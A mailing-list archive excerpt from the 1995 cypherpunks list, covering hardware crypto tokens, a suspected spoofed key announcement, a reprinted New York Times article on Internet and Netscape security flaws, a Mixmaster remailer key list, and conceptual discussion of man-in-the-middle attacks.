-----END PGP SIGNATURE-----
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Tue, 10 Oct 95 18:43:39 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape & Fortessa
Message-ID: <Pine.3.89.9510110202.A28210-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 10 Oct 1995, Hal wrote:

> But hardware is not so simple.  If the only effective way to get
> convenient communications with your net access software became to use a
> hardware token, then it would be a lot easier to put on restrictions.  An
> underground effort to manufacture and distribute tokens would be much
> less practical than one to do the same thing for secure software.

However, as long as the hardware uses a published algorithm, there
shouldn't be too much of a problem in writing a device driver that will
emulate the hardware. Of course, they might attempt to use those tokens to
authenticate the hardware in the application, but that shouldn't be any
harder to patch out than the various software protection schemes that have
fallen in the past.

Frankly, I have no desire to have hardware crypto in my system (nor
anywhere to put it, I'm not wasting a PCMCIA slot on something that I can 
do with software), and unless it's dirt cheap I doubt that many normal
users will want to do so either, particularly if there *is* a software
alternative. Servers might want hardware for performance reasons, but I 
don't see any reason to prefer it otherwise.

So on those grounds, the only real danger would be for the government to 
start selling Clipper cards for $ 5 apiece. Of course, I wouldn't put it 
past them....

	Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Wed, 11 Oct 95 02:52:20 PDT
To: cypherpunks@toad.com
Subject: Re: MITM evasion
Message-ID: <199510111005.DAA25739@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


The message below (posted earlier today) caught my attention - I believe it
is a (fake?) MITM-generated message, because Tim's sig file has changed
recently (new domain name (got.net) and a disclaimer was added). The sig
attached to this anonymous message is at least a month out of date.

Even if this isn't just a mistake, it's not a true MITM attack, since this
is a third party /not/ between Tim and toad.com ... more of a spoof.

Do I win anything?

>Return-Path: owner-cypherpunks@toad.com
>Date: Wed, 11 Oct 1995 09:55:07 +0100
>Subject: MITM evasion
>To: cypherpunks@toad.com
>Subject: MITM evasion
>From: anon-remailer@utopia.hacktic.nl (Anonymous)

       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

>Organization: Hack-Tic International, Inc.
>Comments: Hack-Tic may or may not approve of the content of this posting
>Comments: Please report misuse of this automated remailing service to
<postmaster@utopia.hacktic.nl>
>Sender: owner-cypherpunks@toad.com
>
>Two years ago, I pointed out that getting a single message past
>the man in the middle isn't good enough; you have to convince your

                                 Unconvinced, for one ^^^^^^^^

>readers that the key they received on one channel is more accurate
>than the key they're receiving on all the other channels.
>But if they'll believe that, they may also believe the man in the middle's
>announcement that the key in your name on all the keyservers is
>wrong, and the correct key is the one he's putting out.
>Can't win either way, but it's still important to get the key out.
>
>My current key is 0x54696D4D; the fingerprint is 
>4D 65 44 75 53 61 21 2F   41 73 55 64 85 6D 21 7F.

This key isn't registered with the MIT keyserver; not proof in any sense,
but worth mentioning.

>
>..........................................................................
>Timothy C. May         | Crypto Anarchy: encryption, digital money,
>tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
>408-728-0152           | knowledge, reputations, information markets,
>Corralitos, CA         | black markets, collapse of governments.
>Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
>"National borders are just speed bumps on the information superhighway."
>
>
--
   Jay Campbell   Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node) 
   edge@got.net   MIT PGP KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Oct 95 02:48:02 PDT
To: cypherpunks@toad.com
Subject: NYT on Internet Flaws
Message-ID: <199510110939.FAA26747@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, October 11, 1995, pp. A1, D3.

   [Page One]

   Discovery of lnternet Flaws Is Setback for On-Line Trade

   By John Markoff


   San Francisco, Oct. 10 -- Newly publicized weaknesses in
   the basic structure of the Internet indicate that the
   worldwide computer network may need a time-consuming
   redesign before it can be safely used as a commercial
   medium.

   The flaws could allow an eavesdropper or criminal to divert
   many types of documents or software programs traveling over
   the Internet, examine or copy or alter them, and then pass
   them on to the intended recipient -- who would have no easy
   way of knowing that the files had been waylaid. Not only
   could electronic mail be read in transit or credit card
   numbers be copied en route, but special security techniques
   meant to protect such transactions could be dismantled
   without the user's knowledge.

   That such security flaws exist is not surprising in a
   system designed originally as a scientific experiment. But
   the recent rush to the Internet by companies seeking to
   exploit its commercial possibilities has obscured the fact
   that giving the system a new purpose has unearthed
   fundamental problems that could well put off true
   commercial viability for years.

   "Companies would have you believe this is a trivial
   problem," said Eric Brewer, a professor of computer science
   at the University of California at Berkeley. "But now there
   is a financiat incentive to exploit these flaws and to do
   it secretly."

   The problems were described in a posting that researchers
   at the university made on Monday to several on-line
   discussion groups. While the discussion groups are intended
   for computer security experts, they are potentially
   accessible to millions of Internet users -- including
   break-in artists, who are known to monitor such discussion
   groups for tips on new ways to crack computer systems.

   The researchers who described the Internet weaknesses
   include two Berkeley computer science graduate students who
   noted a security weakness in a popular Netscape
   Communications Corporation software program last month.
   Then as now, the students' stated motivation in publicizing
   the problems was to underscore vulnerabilities facing all
   companies and customers wishing to use the Internet for
   commerce.

   When the Netscape problems were disclosed last month, the
   company said the security flaws would be corrected in the
   next version of its software, which users would be able to
   download at no charge from Netscape's Internet site. But
   the newly publicized flaws in the Internet itself indicate
   that even if a user downloaded a copy of the new, improved
   Netscape program, a criminal could tamper with the copy
   along the way and make it unsafe for use in credit card
   transactions.

   The problem is not Netscape's alone; it potentially affects
   any organization that operates a computer from which files
   or software could be downloaded over the Internet. The
   weakness can be traced to the technical underpinnings of
   the network, which was set up more than a quarter-century
   ago not as a medium for conducting business but as a way
   for academic and scientific researchers to exchange
   information.

   The disclosure of the flaws casts doubt on the aspirations
   of companies like Netscape, which last summer had one of
   the most successful stock offerings in Wall Street history
   based on the promise of the impending arrival of a
   full-fledged on-line marketplace.

   "Companies should take a step back and think about this a
   little more," said Ian Goldberg, one of the Berkeley
   students. "If it takes a bit longer but comes out more
   secure, we will all be better off in the long run."

   The way many Internet systems are set up -- especially the
   Internet's increasingly popular World Wide Web service in
   which software images and even video and audio clips can be
   easily downloaded -- information is stored on a computer
   called a file server and then transferred to a user's
   computer when it is needed.

   The newly publicized weakness occurs in a widely used
   Internet protocol -- or technical standard -- known as the
   Network File System, or NFS. Because NFS does not have any
   means for allowing the recipient of a program or document
   to verify that it has not been altered during transmission
   from the file server to the user, any interception or
   tampering would go undetected.

   "The Internet protocols have been insecure since day one,"
   said Jeffrey I. Schiller, the manager of computer networks
   at the Massachusetts Institute of Technology and director
   of an industry task force that is trying to design a new
   secure version of the Internet.

   But the group's timetable is uncertain, and even when it
   does have recommendations ready, Mr. Schiller is not
   optimistic that the industry will be willing to devote the
   time and money to put them into effect.

   He said that many technologies already exist for improving
   commercial security on the Internet, but many of them
   require too much technical sophistication on the part of
   computer users. He criticized makers of hardware and
   software for not moving more quickly to make easy-to-use
   security features a built-in part of the technology used on
   the Internet.

   "The people who should be the leaders in offering security
   have been too busy counting their money to build these
   features in to their products," Mr. Schiller said.

   Some commercial Internet merchants have tended to play down
   the potential for harm from an illegal interception of
   credit card information over the Internet. They point out
   that consumers routinely make their credit card numbers
   available in transactions done by mail or telephone and
   that the law puts limits on a consumer's liability in cases
   of credit card fraud.

   But Mr. Brewer, the Berkeley professor, said that the
   crucial difference in the proposed Internet commerce
   systems was that for the first time it would be relatively
   simple for a criminal to collect hundreds or thousands of
   credit card numbers. Then a thief could use each credit
   card only one time, making detection much more difficult.

   Sensitive to heightened concerns about security, Wells
   Fargo, the large California bank, which earlier this year
   began permitting customers with personal computers to view
   their account information with the Netscape software,
   suspended the service in September after the Berkeley
   students reported the flaw in Netscape.

   After Netscape followed with an improved version of its
   software, Wells Fargo officials found it secure enough that
   they planned to resume the service later this week. The
   bank will, however, require customers to use the corrected
   version of the Netscape program.

   Even then. Wells Fargo customers will be able only to view
   account balances and other information, but not transfer
   money or conduct other transactions of the type that might
   leave them vulnerable to the Internet NFS weakness.

   "We still hope to be able to offer transactional
   capabilities next year, but this has slowed us down a
   little bit," said Lorna Doubet, a Wells Fargo spokeswoman.
   "Many of our customers feel that security is absolutely
   essential and we have to be cautious in this regard."
             
   Executives at Netscape said yesterday that they were aware
   of the security issues surrounding NFS and would make
   changes in the next release of their software expected
   before the end of the year to permit a recipient of a
   downloaded program to check it for signs of tampering.

   And hoping to take advantage of the fault-finding talents
   of the Berkeley researchers and other like-minded software
   experts, the company announced a contest today called
   Netscape Bugs Bounty, in which Netscape will award prizes
   to users who find bugs or security loopholes in its
   software.

   Some Internet experts said they expected that many security
   weaknesses like the one the Berkeley group had demonstrated
   would be found, because the Internet was simply not
   designed to insure secure commerce.

   "Imagine a walled town or a house," said Noel Chiappa, a
   member of the Internet Engineering Task Force, a
   standards-setting group. "It doesn't matter if 99 windows
   are tight as can be -- if the 100th is wide open, the bad
   guys will bypass your security. "

   [End]













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Oct 95 03:25:40 PDT
To: cypherpunks@toad.com
Subject: Enigma
Message-ID: <199510111025.GAA00819@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The NYT reports today on a British best-selling novel about
   breaking the Enigma codes, published this month in the US:

      Enigma, by Robert Harris, Random House.

      Harris interviewed many of the people who worked at
      Bletchley Park, and, most challenging, had to wrestle
      with complex mathematics to explain how the codes were
      broken ... by an elite comprised of an eccentric band of
      British and refugee intellectuals, aided by young women
      carefully picked from upper-class British families.

      So, Mr. Harris was asked, is the book a celebration of
      British amateurism? "There's a bit of that," he
      conceded. "Just as the British benefited from that
      tradition, the Germans were undone by the ruthless
      military efficiency, which made it easier to read their
      messages. The idea of brains taking on brute strength
      does have a certain romantic appeal."

      More than one reviewer said Harris was a thriller writer
      in the British tradition of Eric Ambler, Len Deighton,
      John Le Carre and John Buchan. "Harris has fashioned a
      story that is as humane, intelligent and gripping as
      documentary fiction can get, the critic Anthony Quinn
      wrote in The Financial Times. This is a story of
      intelligence, romance, twisted logic and necessary
      compromise," Peter Millar wrote in The Times of London,
      adding that it was "altogether top-class stuff."











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Wed, 11 Oct 95 04:38:24 PDT
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: Type2.list/pubring.mix
Message-ID: <Pine.BSD.3.91.951011063259.17980A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here's the latest!

type2.list

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0
spook remailer@spook.alias.net ca8c8679f7b1cbdcff46d780fba97673 2.0
flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11
anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b
secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b
wmono wmono@spook.alias.net f68e6add16880b60eb48a4a4330e2e36 2.0.1
mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1
knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0
robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11
syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11
rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11
replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11
hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11
crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11
gondolin mixmaster@gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1
q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1
Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

pubring.mix

mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1

- -----Begin Mix Key-----
db91418edac3a4d7329feaee0b79c74f
258
AATL25WGQY5CMM0/xBjYtuN6IT75h+aBQwwKqZZc
isOrqdsl8HWAzARrB0iAtcr34c2qqPBzSRNa5UE8
d3jOYu/wp9K9M5abUSRogcDl7gkPlqxc+e72SdKd
2Gdgib8VDGVLpJdaPk4uSY/pkmsYB30OaQH3W8dU
PPciTvSJKAYcTQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0b11

- -----Begin Mix Key-----
bb460f08811a98682def423d30852d11
258
AAShg2h4xGHueryUFNsFBbtSGZBcj+oDImFMkOZA
EQPcbeG6ReEnTnoQ8HBgwtx9isMT9hZ93lBaRY07
ygupHQRi6f+FnlQEZTKqOe+8E+WyDx+ox/1ywgt+
KGFOW+t8WRXA/loKuqD0KH4pwpe7FYE0arGbtm4J
EscGM2DE3TeS3QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0

- -----Begin Mix Key-----
6bb0d89a29fd188c67b8e04516b5af33
258
AATOSyg7N2PVg9VgA8voDWglq6ESNBLqH0heB2iE
NfvmR/VnyAHCb4ZBtHzvM7ZRBdXYmH/Jt490wg6O
ZCbhcIceFKSsibLEH77+111isAhUbHvn0Nh9gOI7
5ngjOGDQaLQvGUbNHRXQaPAZ0rc4lv9gmChJONOJ
7sFC2J96QR4aewAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11

- -----Begin Mix Key-----
3d523f1fd30b5a1c57214960a00f1c4e
258
AATQ2zxiRZ5bQuNBKHEvg11R7L69Hc9ZrjTon3o3
s7fbXmuEaiym48sHoRLAttZ3ADuH1FgbuYt1DF+L
Il9Yp5U9znm9MX0rS8xq1iGg7YDED/3x6OWIp7za
17+pWnYmEF+Rz6YZ2o/67ujcBfrJ/odz+SVlaGqF
rWWjaG/oWdqWWwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11

- -----Begin Mix Key-----
6c4e7372e84d7092e0d0e69c20d5be46
258
AATKhnhAIHXRCKZAi2tehJfQ9s+IsVPjEQQk5xwQ
60VXzmgkC2YirmDFeLz1feNgCMd78GkKHYK5p9WM
HBkPNTDPLraJhJLNDHeHqGtqAI4BTHq/lZ/RMyOH
GV/X5TaUEG69IGb2Rl8OnzNWF9fhKwH6PTE+QiQX
kIcxJnVW+yYOpwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11

- -----Begin Mix Key-----
e7d84921298b0aadaf8f050d145ccf03
258
AASjOGqzTLdjweTMiwirrpVNqXj/ODJVyh9pEo5i
q5ERILOd1hMNKY9XLNFYM30mUR/Fkh0MnYI/ujWz
OTb0rR2a31nvmaLMdaB75nTdGJwHitCmo8k2eTjL
XQsXV6zKrzXGp8H8NO34DAFWJy1qVcev+6lLAWGy
j/fsJJyJNtl94wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11

- -----Begin Mix Key-----
e3e2b4d67314b6165ee03b0b0ae07a7f
258
AATZBfJhv+DGg4OEfQfgVnzZZpumEZHI9CES+Ux2
dBp9RBPpJnAtLpcAyCIkNjSaik0togcKhFgcR3nt
XIrWclJ/uO/Z1fqW7ESLwzXozCpqnG5S/y6mUPuL
yzA9bqtAGd+pvxuK/Cw2Zzx+1QGp0VtWb46KxqvC
S4POHYFljkrQiQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11

- -----Begin Mix Key-----
bf61835a7b3cfa59c409caeab4e8a222
258
AATkwgy72zwwavCHn1OytNMsBYAIBnCFa2hcbZPi
IN6eS4jDgFdld5DlcqqzdN6Lxv96i0Dg7ElFyAFR
5zmof3oaNqh5vbq/fTEbvFtX9EGyuqkfN6fKoAEv
G7gtmkfosoIg/jnI8AL9KC/J5mGaxrWYB6XBe+v9
iI1pOSbPsDCsdQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11

- -----Begin Mix Key-----
64c62de6b347b3050fbb6e94c649112d
258
AATLe0CWPSn844FCeL7FzUlf+vE2qfYBPs/8PYYm
BfITjknJjD0dk7vXhX9Qc5PFgDWRHhVoIRlFT3sc
Jp2UVFLOZ5zn/WiT9Wa1tZsqejDf3MRIDT/K6cHB
uB/SUaxLzNfk/wG1uBTUHukdjwCyDxNLHuYA5mVz
opYJhQR0Nc/ESQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

spook remailer@spook.alias.net ca8c8679f7b1cbdcff46d780fba97673 2.0

- -----Begin Mix Key-----
ca8c8679f7b1cbdcff46d780fba97673
258
AATZXVb4yP3MGt/ZCR5FtrHPMgYNyXHBmnG8KWO0
UaT5jbMqBdRQEzOVrCN/5RXerpS8Hctbc5MrwhSr
fh/byQLwLkY50zYAxWSRBpaAJgZtCnQtVTgmt9yu
BDiCE2OasFnZlwsi+9t8+c5R2bS3C6UhjQsgybbF
Aw7xWK3v3fPJqQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11

- -----Begin Mix Key-----
64bbf500097b541a8ddcb2dd80373238
258
AAS5NFs7yPSFv+WwpO26/2OS7CYJDtrhlrEasf8S
jJ9P0jqWXuorDIMKT3YfvSkk2xKqAHiHrOFEqltY
plIUCoXyAf/7CmNyPYdTN6xNxO74ZIsTQnNgAJT3
6a8+JL92DZJM6pYfhpSvPq7lj5X0h6Hj/oCAlqiS
31TZJkd2jenjDQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

gondolin mixmaster@gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1

- -----Begin Mix Key-----
1d767b08fefa0a79d508be73e472d326
258
AATAwVkC3FI6NDi0GJvH+FBIK6MYVHvXofEoKMTc
u7P1rI7yCW00JOF71k373wyepZDksw9wjZdrHZAB
uyN7SICMaKPRvMA4rseZFjefzYaoFf5tO0OqFgcQ
/pMOPDwYl0nHyuLJvqjpADMDtatQaN2+/T/HtcMX
Q1KCcLk24jEWbQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1

- -----Begin Mix Key-----
c44e1cb0f0709465c21b07ac972bf973
258
AATDBaiKBy4jPlRUIQmVvcjO/GhWLbsls+mKloml
5EScYl+3fGw04P4xVcWOSledFVxKVfNy+xTVI8pE
XGXSr0cRUIa1NttzNPk/KObb5SvkeqGtWAyRiWBS
G91MkWM6LbqzKPcu6gUON47wJCJCzdvgbUIeVJIT
MnyBvMWJX5CKAwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

- -----Begin Mix Key-----
7251877ae6fed509ebf7567715974d1b
258
AASWRIpH97WDVCNc/kiLqvmxqwN9cAAbZFi+FIwr
gCixQRTtD/SXuXd62iIqRMp3xm4c+uSnTzLijIxi
fCYLacNMVeh0PXAszfFIh6CBicPq1UWt82Wu5dqw
K/goNULqNDUypGQtOfOpHSQKPwAphXplKhv75OZs
SjtMoEcv0CCk3wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b

- -----Begin Mix Key-----
bc2e4251dbddfa74dfae8b274904c2be
258
AATBBbpmFw7omad8hpvxQiylmoi5MBXs5SivpcY6
65jnhZIiL9HvTE+Rq+30STccDsQWze0/iZthg1RL
tCXYtABwkfsHOf60/aq1aOBobkquzBItvzQMG0W/
TkVinZYUTqfdytl/pfLDIQiXv7Z0t98MrLsmVopE
1NQS7sH6g9srFwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b

- -----Begin Mix Key-----
e3ca4cc5beb9934ae6d52dd27da80332
258
AATZuNYrX4bw6A01PA00qMr7KeJsnHIq9wYoSc5P
OrHUEvPUoCxmLfuhwF9eEfSkV4t9DLPIMhKXM4iL
Afhv2IZKeWaA98q4NHb6E7Gg6/e6uCI1O3nmXXK8
la4ij9RneCHig5K6JlCh3MJTkuW/IEYQjMrz2/H5
RUDEwx+/HL5K0QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

wmono wmono@spook.alias.net f68e6add16880b60eb48a4a4330e2e36 2.0.1

- -----Begin Mix Key-----
f68e6add16880b60eb48a4a4330e2e36
258
AASe+l+eIE1GYugbIPDG87h9wIFD0KqLWrMiN0PN
RBCmRwsHOu1mZDnJTPlg7RXI17+DJMkk+huGPTuA
T+KilAv8WFKWmvHuOpIBwxVBMXFKHsrQYHES63t0
UMQvRCv9LXZZvmiBWKrZp5vQaSOZKYLf4v3pQw7U
SsbB5geSP9fQ2wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQEVAwUBMHusbaghiWHnUu4JAQEVhgf9EsZdugAsPzB9qjXf9S4w9ucjG8myCq5l
J4/9rYYTOLusK+L07QXQsGZcAQsDvULXMKshKY+4dKTfYp9Z8fClk7nBUO0h0PZK
4eAfAOLwADZl4do0tAlh7AyIWI0QRAwWrh4ufhY6MuLaKJpgraHGaK0sbDvZZdEZ
OBvn50HkksSBkHv441g8u5ZvXRfbFdeW0ii4qIPqoKhB22yWv2L1DnRdWP8/b/OL
aLN9c0w054AFXo1f4hd+ZW3ufT8f7YXnda3rUCGe0GstPMvrpB22bdkt+t2QuYBn
Mn4gzS6bMfBFms8hYQgaLd+ACHWVuc6WTZ4svNp8nDGSDK8EX7ou5g==
=wrcD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 11 Oct 95 04:11:29 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Graphic encryption and XV
In-Reply-To: <9510061622.AA02423@ch1d157nwk>
Message-ID: <9510111109.AA19990@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have patches to XV that allow it to display a PGP
encrypted image without having to explicitly decrypt it first?

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 11 Oct 95 07:16:11 PDT
To: cypherpunks@toad.com
Subject: Mean Men in the Middle
Message-ID: <199510111415.HAA24732@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


If the MITM is really mean, he can overcome some of the suggestions I
offered for how credentials can be used to defeat him.

First, he could cause the user to download bad software.  PGP,
Netscape, and other secure programs could be patched to have holes.
Even the checksum program could be altered so publishing checksums won't
help.  With this attack he would not even need to substitute keys; he
can just make sure that the fake PGP picks guessable session and secret
keys.

